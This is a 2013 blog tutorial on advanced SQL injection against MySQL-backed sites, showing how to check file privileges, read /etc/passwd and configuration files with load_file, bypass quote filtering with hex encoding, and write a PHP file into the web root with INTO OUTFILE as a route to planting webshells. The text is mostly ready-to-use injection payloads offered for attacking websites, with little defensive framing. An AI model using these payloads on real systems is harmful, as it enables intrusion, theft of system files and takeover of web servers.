Monday, October 14, 2013

Local File Inclusion and Shell Writing using SQL Injection

First of all hello to all readers whoever is reading this article. Once again I am going to tell you about advance SQL Injection , I am not going to tell you about the basic SQLi stuff and I assume that you’ve already read my previous article about URL Based SQL Injection. If you haven’t read that, please go on the following link:
This time I am going to tell you about reading (Local File Inclusion) and writing (PHP Code Writing) file through SQL Injection. First of all in order to read or write the files from the database server (usually web servers because 90% cases both database and web server is the same computer), we must have file privileges.
Let us assume the example of previous article having the following URL: UNION ALL SELECT 1,2,3,4–

Now assuming the vulnerable column is 3, we can check the current user by injecting @@user or user() in place of 3: UNION ALL SELECT 1,2,user(),4–

If the user is root@localhost, then chances of file privileges are more. If your target doesn’t have ‘root’ as a user, don’t loose your heart we still might have file privileges. To check the file privileges we can execute the following query: UNION ALL SELECT 1,2,file_priv,4 where username=user();–

If we are getting a ‘Y’ then we have file privileges and we can read or write files. But if it doesn’t reply ‘Y’ we can still try by reading a file from the server. The file which we should read is ‘/etc/passwd’ as it is usually available to all users on linux/unix platform. To read the files from the server we will use the function load_file(): UNION ALL SELECT 1,2,load_file(‘/etc/passwd’),4–

Sometimes, the apostrophe (‘) is blocked in the URL so we can encode our file location in hexadecimal code like below: UNION ALL SELECT 1,2,load_file(0x2f6574632f706173737764),4–

NOTE: Don’t forget to put ‘0x’ before the hexadecimal code.
If we are able read the passwd file, then we may try for other configuration files for further exploitations, like httpd.conf.
In order to write files on the server we must note that if the apostrophe is blocked in the URL then we cannot write the file on the server as it require the use of apostrophe. Now as we know apostrophe is required, let us assume that apostrophe is not blocked so we can write the file. To write a file on the server we will be using “INTO OUTFILE” as below: UNION ALL SELECT 1,2,’Kyrion Hacking Tutorials’,4 INTO OUTFILE ‘/tmp/pentest.txt’–

It is a good practice to write files in /tmp directory, as all users have writing priviliges in /tmp directory. We can read the file from/tmp directory again to confirm: UNION ALL SELECT 1,2,load_file(‘/tmp/pentest.txt’),4–

After confirming the file which we’ve written we can write a webshell on the target website after encoding the shell code into hexadecimal. Assuming that web directory is “/var/www/html/” (which we can confirm after reading httpd.conf) and code which we want to write in test.php is‘<?php echo  “ Kyrion Hacking Tutorials” ?>’ , the URL will be: UNION ALL SELECT1,2,unhex(3c3f706870206563686f2020221c4b7972696f6e204861636b696e67205475746f7269616c7322201d203f3e),4 INTO OUTFILE ‘/var/www/html/test.php’–

As you might’ve noticed that the code which we are going to write must be encoded in hexadecimal else it will not work. Now we can execute the code by just going to the URL:

This is how you can read and write files on a server using SQL Injection. Using the above method one can write malicious code, e.g. webshells on a website using SQL Injection vulnerability. I hope some of you will find this useful.

No comments:

Post a Comment